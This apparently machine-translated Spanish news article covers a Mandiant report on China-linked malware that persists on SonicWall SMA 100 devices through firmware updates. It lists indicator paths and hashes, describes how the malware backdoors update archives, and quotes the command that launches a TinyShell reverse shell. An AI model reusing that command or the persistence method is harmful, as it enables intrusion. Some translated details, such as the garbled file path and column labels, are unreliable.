Los actores de amenazas con una conexión con el gobierno chino están infectando un dispositivo de seguridad ampliamente utilizado de SonicWall con malware que permanece activo incluso después de que el dispositivo recibe actualizaciones de firmware, dijeron los investigadores.
de SonicWall Acceso móvil seguro 100 es un dispositivo de acceso remoto seguro que ayuda a las organizaciones a implementar fuerzas de trabajo remotas de manera segura. Los clientes lo utilizan para otorgar controles de acceso granular a usuarios remotos, proporcionar conexiones VPN a las redes de la organización y establecer perfiles únicos para cada empleado. El acceso que tiene el SMA 100 a las redes de los clientes lo convierte en un objetivo atractivo para los actores de amenazas.
En 2021, el dispositivo fue atacado por piratas informáticos sofisticados que explotaron lo que entonces era una vulnerabilidad de día cero. Los dispositivos de seguridad de Fortinet y Pulse Secure han sufrido ataques similares en los últimos años.
Ganar persistencia a largo plazo dentro de las redes
El jueves, la firma de seguridad Mandiant publicó un informe que dichos actores de amenazas con un presunto nexo con China estaban involucrados en una campaña para mantener la persistencia a largo plazo mediante la ejecución de malware en dispositivos SonicWall SMA sin parches. La campaña se destacó por la capacidad del malware de permanecer en los dispositivos incluso después de que su firmware recibiera un nuevo firmware.
“Los atacantes pusieron un esfuerzo significativo en la estabilidad y persistencia de sus herramientas”, escribieron los investigadores de Mandiant Daniel Lee, Stephen Eckels y Ben Read. “Esto permite que su acceso a la red persista a través de actualizaciones de firmware y mantenga un punto de apoyo en la red a través del dispositivo SonicWall”.
Para lograr esta persistencia, el malware busca actualizaciones de firmware disponibles cada 10 segundos. Cuando una actualización está disponible, el malware copia el archivo archivado para hacer una copia de seguridad, lo descomprime, lo monta y luego copia todo el paquete de archivos maliciosos en él. El malware también agrega un usuario raíz de puerta trasera al archivo montado. Luego, el malware vuelve a comprimir el archivo para que esté listo para la instalación.
“La técnica no es especialmente sofisticada, pero muestra un esfuerzo considerable por parte del atacante para comprender el ciclo de actualización del dispositivo, luego desarrollar y probar un método de persistencia”, escribieron los investigadores.
Las técnicas de persistencia son consistentes con una campaña de ataque en 2021 que usó 16 familias de malware para infectar dispositivos Pulse Secure. Mandiant atribuyó los ataques a múltiples grupos de amenazas, incluidos los rastreados como UNC2630, UNC2717, que según la compañía respaldan “prioridades clave del gobierno chino”. Mandiant atribuyó los ataques en curso contra los clientes de SonicWall SMA 100 a un grupo rastreado como UNC4540.
“En los últimos años, los atacantes chinos han implementado múltiples exploits de día cero y malware para una variedad de dispositivos de red orientados a Internet como una ruta hacia la intrusión empresarial completa, y la instancia reportada aquí es parte de un patrón reciente que Mandiant espera que continúe en el futuro. a corto plazo”, escribieron los investigadores de Mandiant en el informe del jueves.
Acceso altamente privilegiado
El objetivo principal del malware parece ser el robo de contraseñas criptográficamente codificadas para todos los usuarios que han iniciado sesión. También proporciona un shell web que el actor de amenazas puede usar para instalar nuevo malware.
“El análisis de un dispositivo comprometido reveló una colección de archivos que le dan al atacante un acceso altamente privilegiado y disponible al dispositivo”, escribieron los investigadores en el informe del jueves. “El malware consiste en una serie de scripts bash y un solo binario ELF identificado como una variante de TinyShell. El comportamiento general del conjunto de scripts bash maliciosos muestra una comprensión detallada del dispositivo y está bien adaptado al sistema para brindar estabilidad y persistencia”.
La lista de malware es:
| Camino | Picadillo | Función |
| /bin/cortafuegos | e4117b17e3d14fe64f45750be71dbaa6 | Proceso principal de malware |
| /bin/httpsd | 2d57bcb8351cf2b57c4fd2d1bb8f862e | Puerta trasera TinyShell |
| /etc/rc.d/rc.local | 559b9ae2a578e1258e80c45a5794c071 | Persistencia de arranque para firewalld |
| /bin/iptabled | 8dbf1effa7bc94fc0b9b4ce83dfce2e6 | Proceso de malware principal redundante |
| /bin/geoBotnetd | 619769d3d40a3c28ec83832ca521f521 | Script de puerta trasera de firmware |
| /bin/ifconfig6 | fa1bf2e427b2defffd573854c35d4919 | Script de apagado elegante |
El informe continuó:
El principal punto de entrada del malware es un script bash llamado
firewalldque ejecuta su bucle principal una vez para contar todos los archivos del sistema al cuadrado: …for j in $(ls / -R) do for i in $(ls / -R) do:… El script es responsable de ejecutar un comando SQL para lograr el robo de credenciales y la ejecución de los otros componentes.La primera función en
firewalldejecuta la puerta trasera TinyShellhttpsdcon comandonohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 &Si elhttpsdel proceso aún no se está ejecutando. Esto configura a TinyShell en modo de shell inverso, indicándole que llame a la dirección IP y al puerto antes mencionados en una hora y día específicos representados por el-mbandera, con un intervalo de baliza definido por el-dbandera. El binario incorpora una dirección IP codificada, que se utiliza en el modo de shell inverso si el argumento de la dirección IP se deja en blanco. También tiene un modo de shell de enlace de escucha disponible.
Los investigadores dijeron que no sabían cuál era el vector de infección inicial.
La semana pasada, SonicWall publicó un consultivo que instó a los usuarios de SMA 100 a actualizar a la versión 10.2.1.7 o superior. Esas versiones incluyen mejoras como el monitoreo de integridad de archivos y la identificación de procesos anómalos. el parche esta disponible aquí. Los usuarios también deben revisar periódicamente los registros en busca de signos de compromiso, incluidos inicios de sesión anormales o tráfico interno.